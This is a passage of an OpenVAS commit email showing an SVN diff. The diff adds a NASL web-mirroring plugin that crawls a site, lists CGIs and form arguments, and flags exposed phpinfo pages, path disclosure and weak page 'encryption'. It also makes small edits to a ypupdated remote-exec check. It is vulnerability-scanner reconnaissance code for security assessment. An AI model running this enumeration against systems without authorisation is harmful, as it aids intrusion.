+    else return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"http://[^/]*/([^?]*)", replace:"/\1", icase:TRUE));
+   }
+  }
+ }
+ else
+ {
+ if(url == "//")  return "/";
+
+ if(ereg(pattern:"^//.*", string:url, icase:TRUE))
+ {
+  location = ereg_replace(string:url, pattern:"//([^/]*)/.*", replace:"\1", icase:TRUE);
+  if(location != url)
+  {
+   if(location == get_host_name())return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"//[^/]*/([^?]*)", replace:"/\1", icase:TRUE));
+  }
+  return NULL;
+ }
+ 
+ if(url[0] == "/")
+  return remove_cgi_arguments(url:url);
+ else
+ {
+  i = 0;
+  num_dots = 0;
+ 
+  while(i < strlen(url) - 2 && url[i] == "." && url[i+1] == "." && url[i+2] == "/")
+  {
+   num_dots ++;
+   url = url - "../";
+   if(strlen(url) == 0)break;
+  }
+  
+  while(i < strlen(url) && url[i] == "." && url[i+1] == "/")
+  {
+    url = url - "./";
+    if(strlen(url) == 0)break;
+  }
+  url = string(basename(name:current, level:num_dots), url);
+ }
+ 
+ i = stridx(url, "#");
+ if(i >= 0)url = substr(url, 0, i - 1);
+ 
+
+ if(url[0] != "/")
+ 	return remove_cgi_arguments(string("/", url));
+ else
+ 	return remove_cgi_arguments(url:url);
+ }
+ return NULL;
+}
+
+
+
+#--------------------------------------------------------------------#
+
+ 
+function my_http_get(item, port)
+{
+ local_var ret, accept, idx;
+ 
+ ret = http_get(item:page, port:port);
+ accept = egrep(string:ret, pattern:"^Accept:.*");
+ ret = ret - accept;
+ idx = stridx(ret, string("\r\n\r\n"));
+
+ 
+ ret = insstr(ret, string("\r\nAccept: text/html, text/xml\r\n\r\n"), idx);
+ return ret;
+}
+
+
+function extract_location(data)
+{
+ local_var loc, url;
+ 
+
+ 
+ loc = egrep(string:data, pattern:"^Location: ");
+ if(!loc) return NULL;
+ 
+ loc = loc - string("\r\n");
+ loc = ereg_replace(string:loc, 
+                              pattern:"Location: (.*)$",
+                              replace:"\1");
+ 
+ 
+ 
+  url = canonical_url(url:loc, current:"/"); 
+  if( url )
+  {
+   add_url(url : url);
+   return url;
+  }
+  
+  return NULL;
+}
+
+
+
+function retr( port, page )
+{
+ local_var req, resp, q;
+ 
+ if( debug )display("*** RETR ", page, "\n");
+  
+ req = my_http_get(item:page, port:port);
+ resp = my_http_keepalive_send_recv(port:port, data:req);
+ if( resp == NULL ) exit(0); # No web server
+ 
+ if(!match(pattern:"HTTP* 200 *", string:resp))
+ {
+  if(match(pattern:"HTTP* 401 *", string:resp) ||
+     match(pattern:"HTTP* 403 *", string:resp))
+     {
+      add_auth(url:page);
+      return NULL;
+     }
+  if(match(pattern:"HTTP* 301 *", string:resp) ||
+     match(pattern:"HTTP* 302 *", string:resp))
+  { 
+   q = egrep(pattern:"^Location:.*", string:resp);
+   add_30x(url:page);
+   
+   # Don't echo back what we added ourselves...
+   if(!(("?PageServices" >< page || "?D=A" >< page) && ("?PageServices" >< q || "?D=A" >< q)))
+   	extract_location(data:resp);
+   return NULL;
+  }
+ }
+ 
+ if(egrep(pattern:"^Server:.*Apache.*", string:resp))Apache ++;
+ else if(egrep(pattern:"^Server:.*Netscape.*", string:resp))iPlanet ++;
+ 
+ if(!egrep(pattern:"^Content-Type: text/(xml|html).*", string:resp))
+ 	return NULL;
+ else 
+ 	{
+	resp = strstr(resp, string("\r\n\r\n"));
+	if(!resp)return NULL; # Broken web server ?
+	resp = str_replace(string:resp, find:string("\r\n"), replace:" ");
+	resp = str_replace(string:resp, find:string("\n"), replace:" ");
+	resp = str_replace(string:resp, find:string("\t"), replace:" ");
+ 	return resp;
+	}
+}
+
+#---------------------------------------------------------------------------#
+
+
+function token_split(content)
+{
+ local_var i, j, k, str;
+ local_var ret, len, num;
+ 
+ num = 0;
+ 
+ ret = make_list();
+ len = strlen(content);
+ 
+ for (i=0;i<len;i++)
+ {
+  if(((i + 3) < len) && content[i]=="<" && content[i+1]=="!" && content[i+2]=="-" && content[i+3]=="-")
+  {
+   j = stridx(content, "-->", i);
+   if( j < 0)return(ret);
+   i = j;
+  }
+ else  
+  if(content[i]=="<")
+  {
+   str = "";
+   i ++;
+   
+   while(content[i] == " ")i ++;
+   
+   for(j = i; j < len ; j++)
+   {
+    if(content[j] == '"')
+    {
+      k = stridx(content, '"', j + 1);
+      if(k < 0){
+      	return(ret); # bad page
+	}
+      str = str + substr(content, j, k);
+      j = k;
+    }
+    else if(content[j] == '>')
+    {        
+     if(ereg(pattern:"^(a|area|frame|meta|iframe|link|img|form|/form|input|button|textarea|select|applet)( .*|$)", string:str, icase:TRUE))
+     	{
+        num ++;
+     	ret = make_list(ret, str);
+        if ( num > 50 ) return ret; # Too many items
+	}
+     break;
+    }
+    else str = str + content[j];
+   }
+   i = j;
+  }
+ }
+ 
+ return(ret);
+}
+
+
+
+function token_parse(token)
+{
+ local_var ret, i, j, len, current_word, word_index, current_value, char;
+ 
+ 
+ ret = make_list();
+ len = strlen(token);
+ current_word = "";
+ word_index = 0;
+ 
+ for( i = 0 ; i < len ; i ++)
+ {
+  if((token[i] == " ")||(token[i] == "="))
+  {
+   while(i+1 < len && token[i+1] == " ")i ++;
+   if(i >= len)break;
+   
+   if(word_index == 0)
+   {
+    ret["nasl_token_type"] = tolower(current_word);
+   }
+   else
+   {
+    while(i+1 < len && token[i] == " ")i ++;
+    if(token[i] != "=")
+    {
+    	 ret[tolower(current_word)] = NULL; 
+    }
+    else
+    {
+    	i++;
+	char = NULL;
+	if(i >= len)break;
+    	if(token[i] == '"')char = '"';
+	else if(token[i] == "'")char = "'";
+	
+	if(!isnull(char))
+ 	{
+	 j = stridx(token, char, i + 1);
+	 if(j < 0)
+	  {
+	  if(debug)display("PARSE ERROR 1\n");
+	  return(ret); # Parse error
+	  }
+	 ret[tolower(current_word)] = substr(token, i + 1, j - 1);
+	 while(j+1 < len &&  token[j+1]==" ")j++;
+	 i = j;
+	}
+        else
+        {
+         j = stridx(token, ' ', i + 1);
+	 if(j < 0)
+	  {
+	   j = strlen(token);
+	  }
+	 ret[tolower(current_word)] = substr(token, i, j - 1);
+	 i = j;
+       }
+     }
+   }
+    current_word = "";
+    word_index ++;
+  }
+  else {
+  	if(i < len)current_word = current_word + token[i];
+	}
+ }
+ 
+ if(!word_index)ret["nasl_token_type"] = tolower(current_word);
+ return ret;
+}
+
+
+#-------------------------------------------------------------------------#
+
+function parse_java(elements) 
+{
+    archive = elements["archive"];
+    code = elements["code"];
+    codebase = elements["codebase"];
+
+    if (codebase) 
+    {
+         if (archive)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",archive));
+         if (code)
+             set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",code));
+    } 
+    else 
+    {
+         if (archive)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:archive);
+         if (code)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:code);
+    }
+}
+
+
+
+
+
+
+
+function parse_javascript(elements, current)
+{
+  local_var url, pat;
+  
+  if(debug > 15)display("*** JAVASCRIPT\n");
+  
+  pat = string(".*window\\.open\\('([^',", raw_string(0x29), "]*)'.*\\)*");
+  url = ereg_replace(pattern:pat,
+  		     string:elements["onclick"],
+		     replace:"\1",
+		     icase:TRUE);
+		
+  	     
+  if( url == elements["onclick"])
+   return NULL;
+  
+  url = canonical_url(url:url, current:current); 
+  if( url )
+  {
+   add_url(url : url);
+   return url;
+  }
+  
+  return NULL;
+}
+
+
+function parse_dir_from_src(elements, current)
+{
+ local_var src, dir;
+ 
+ src = elements["src"];
+ if( ! src ) return NULL;
+ 
+ src = canonical_url(url:src, current:current);
+ dir = dir(url:src);
+ if(dir && !Dirs[dir])
+ {
+  Dirs[dir] = 1;
+  set_kb_item(name:string("www/", port, "/content/directories"), value:dir);
+  if(isnull(URLs_hash[dir]))
+   {
+    URLs = make_list(URLs, dir);
+    URLs_hash[dir] =  0;
+   }
+  }
+}
+
+
+function parse_href_or_src(elements, current)
+{
+ local_var href;
+ 
+ href = elements["href"];
+ if(!href)href = elements["src"];
+ 
+ if(!href){
+	return NULL;
+	}
+ 
+ href = canonical_url(url:href, current:current);
+ if( href )
+ {
+  add_url(url: href);
+  return href;
+ }
+}
+
+
+function parse_refresh(elements, current)
+{
+ local_var href, content, t, sub;
+ 
+ content = elements["content"];
+ 
+ if(!content)
+  return NULL;
+ t = strstr(content, ";");
+ if( t != NULL ) content = substr(t, 1, strlen(t) - 1);
+ 
+ content = string("a ", content);
+ sub = token_parse(token:content);
+ 
+ if(isnull(sub)) return NULL;
+ 
+ href = sub["url"];
+ if(!href)
+  return NULL;
+ 
+ href = canonical_url(url:href, current:current);
+ if ( href )
+ {
+  add_url(url: href);
+  return href;
+ }
+}
+
+
+function parse_form(elements, current)
+{
+ local_var action;
+ 
+ action = elements["action"];
+ 
+ action = canonical_url(url:action, current:current);
+ if ( action )
+   return action;
+ else 
+   return NULL;
+}
+
+
+function pre_parse(data, src_page)
+{
+    local_var php_path, fp_save, data2;
+
+    if ("Index of /" >< data)
+    {
+    	    if(!Misc[src_page])
+	    {
+	    if("?D=A" >!< src_page && "?PageServices" >!< src_page)
+	    	{
+             	 misc_report = misc_report + string("Directory index found at ", src_page, "\n");
+	   	 Misc[src_page] = 1;
+		 }
+	    }
+    }
+    
+    if ("<title>phpinfo()</title>" >< data)
+    {
+    	    if(!Misc[src_page])
+	    {
+            misc_report = misc_report + string("Extraneous phpinfo() script found at ", src_page, "\n"); 
+	    Misc[src_page] = 1;
+	    }
+            
+    }
+    
+    if("Fatal" >< data || "Warning" >< data)
+    {
+    data2 = strstr(data, "Fatal");
+    if(!data2)data2 = strstr(data, "Warning");
+    
+    data2 = strstr(data2, "in <b>");
+    
+    php_path = ereg_replace(pattern:"in <b>([^<]*)</b>.*", string:data2, replace:"\1");
+    if (php_path != data2)
+    {
+        if (!Misc[src_page])
+        {
+            misc_report = misc_report + string("PHP script discloses physical path at ", src_page, " (", php_path, ")\n");
+	    Misc[src_page] = 1;
+        }
+     }
+    }
+    
+   
+    data2 = strstr(data, "unescape");
+    
+    if(data2 && ereg(pattern:"unescape..(%([0-9]|[A-Z])*){200,}.*", string:data2))
+    {
+     if(!Misc[src_page])
+     {
+      misc_report += string(src_page, " seems to have been 'encrypted' with HTML Guardian\n");
+      guardian ++;
+     }
+    }
+    
+    if("CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM" >< data)
+    {
+     if(!Misc[src_page])
+     {
+      misc_report += string(src_page, " seems to contain links 'protected' by CoffeCup\n");
+      coffeecup++;
+     }
+     
+      
+    }
+
+    if("SaveResults" >< data)
+    { 
+    fp_save = ereg_replace(pattern:string("(.*SaveResults.*U-File=)", quote, "(.*)", quote, ".*"), string:data, replace:"\2");
+    if (fp_save != data)
+     {
+        if (!Misc[src_page])
+        {
+            misc_report = misc_report + string("FrontPage form stores results in web root at ", src_page, " (", fp_save, ")\n");
+	    Misc[src_page] = 1;
+        }   
+     }
+   }
+}
+
+
+
+function parse_main(current, data)
+{
+ local_var tokens, elements, cgi, form_cgis, form_cgis_level, args, store_cgi;
+ 
+ form_cgis = make_list();
+ form_cgis_level = 0;
+ argz = NULL;
+ store_cgi = 0;
+ tokens = token_split(content: data);
+ foreach token (tokens)
+ {
+   elements = token_parse(token:token);
+   if(!isnull(elements))
+   {
+    
+    if(elements["onclick"])
+    	parse_javascript(elements:elements, current:current);
+
+    if ( elements["nasl_token_type"] == "applet")
+        parse_java(elements:elements);
+	
+    if(elements["nasl_token_type"] == "a" 	  || 
+       elements["nasl_token_type"] == "link" 	  ||
+       elements["nasl_token_type"] == "frame"	  ||
+       elements["nasl_token_type"] == "iframe"	  ||
+       elements["nasl_token_type"] == "area")
+        if( parse_href_or_src(elements:elements, current:current) == NULL) {
+	  if(debug > 20)display("ERROR - ", token, "\n");
+	  }
+    if(elements["nasl_token_type"] == "img")
+    	parse_dir_from_src(elements:elements, current:current);
+	
+    if(elements["nasl_token_type"] == "meta")
+    	parse_refresh(elements:elements, current:current);
+			  
+    if( elements["nasl_token_type"] == "form" )
+    {
+      cgi = parse_form(elements:elements, current:current);
+      if( cgi )
+      {
+       form_cgis[form_cgis_level] = cgi;
+       store_cgi = 1;
+      }
+      form_cgis_level ++;
+    }
+    
+   if( elements["nasl_token_type"] == "/form")
+    {
+     form_cgis_level --;
+     if( store_cgi != 0) add_cgi(cgi:form_cgis[form_cgis_level], args:argz);
+     argz = "";
+     store_cgi = 0;
+    } 
+   
+   if( elements["nasl_token_type"] == "input" ||
+       elements["nasl_token_type"] == "select")
+    {
+     if(elements["name"])
+    	 argz += string( elements["name"], " [", elements["value"], "] ");
+    }
+   }
+ }
+}
+
+
+#----------------------------------------------------------------------#
+#				MAIN()				       #
+#----------------------------------------------------------------------#
+
+
+
+start_page = script_get_preference("Start page : ");
+if(isnull(start_page) || start_page == "")start_page = "/";
+
+
+max_pages = int(script_get_preference( "Number of pages to mirror : " ));
+if(max_pages <= 0)max_pages = 30;
+
+dirs = get_kb_list(string("www/", port, "/content/directories"));
+
+
+num_cgi_dirs = 0;
+if ( thorough_tests ) max_cgi_dirs = 1024;
+else max_cgi_dirs = 16;
+
+
+
+debug = 0;
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+URLs = make_list(start_page);
+if(dirs) URLs = make_list(start_page, dirs);
+URLs_hash[start_page] = 0;
+
+
+Apache = 0;
+iPlanet = 0;
+
+CGIs = make_list();
+Misc = make_list();
+Dirs = make_list();
+
+CGI_Dirs_List = make_list();
+
+URLs_30x_hash = make_list();
+URLs_auth_hash = make_list();
+
+
+Code404 = make_list();
+
+misc_report = "";
+cnt = 0;
+
+RootPasswordProtected = 0;
+
+guardian  = 0;
+coffeecup = 0;
+
+foreach URL (URLs)
+{ 
+ if(!URLs_hash[URL])
+ {
+ 	page = retr(port:port, page:URL);
+	cnt ++;
+	pre_parse(src_page:URL, data:page);
+	parse_main(data:page, current:URL);
+ 	URLs_hash[URL] = 1;
+	if(cnt >= max_pages)break;
+ }
+}
+
+
+if(cnt == 1)
+{
+ if(RootPasswordProtected)
+ {
+  set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE);
+ }
+}
+foreach URL (URLs)
+{
+ display(URL,"\n");
+}
+
+display("-----------------------------------------\n");
+
+
+report = "";
+
+foreach foo (keys(CGIs))
+{
+ args = CGIs[foo];
+ if(!args) args = "";
+ set_kb_item(name:string("www/", port, "/cgis"), value:string(foo, " - ", args));
+ 
+  
+ if(!report) 
+ 	report = string("The following CGI have been discovered :\n\nSyntax : cginame (arguments [default value])\n\n", foo, " (", args, ")\n");
+ else
+ 	report = string(report, foo, " (", args, ")\n");
+}
+
+if(misc_report)
+{ 
+
+ report =  string(report, "\n\n", misc_report);
+}
+
+
+if(guardian)
+{
+ report += string("
+ 
+HTML Guardian is a tool which claims to encrypt web pages, whereas it simply
+does a transposition of the content of the page. It is is no way a safe
+way to make sure your HTML pages are protected.
+
+See also : http://www.securityfocus.com/archive/1/315950
+BID : 7169");
+}
+
+
+if(coffeecup)
+{
+ report += "
+ 
+CoffeeCup Wizard is a tool which claims to encrypt links to web pages,
+to force users to authenticate before they access the links. However,
+the 'encryption' used is a simple transposition method which can be 
+decoded without the need of knowing a real username and password.
+
+BID : 6995 7023";
+}
+
+if(strlen(report))
+{
+ security_note(port:port, data:report);
+}
+


Property changes on: trunk/openvas-plugins/scripts/webmirror.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -50,7 +50,7 @@
  exit(0);
 }
 
-include("sunrpc_func.inc");
+include("misc_func.inc");
 
 g_timeout = 15;	# Must be greater than the maximum sleep value
 RPC_PROG = 100028;
@@ -116,7 +116,7 @@
 tcp_ports = get_kb_list('Services/RPC/ypupdated');
 if (isnull(tcp_ports))
 {
- port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP);
+ port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
  if (port) tcp_ports = make_list(port);
 }
 
@@ -126,7 +126,7 @@
 udp_ports = get_kb_list('Services/udp/RPC/ypupdated');
 if (isnull(udp_ports))
 {
- port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP);
+ port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
  if (port) udp_ports = make_list(port);
 }
 



More information about the Openvas-commits mailing list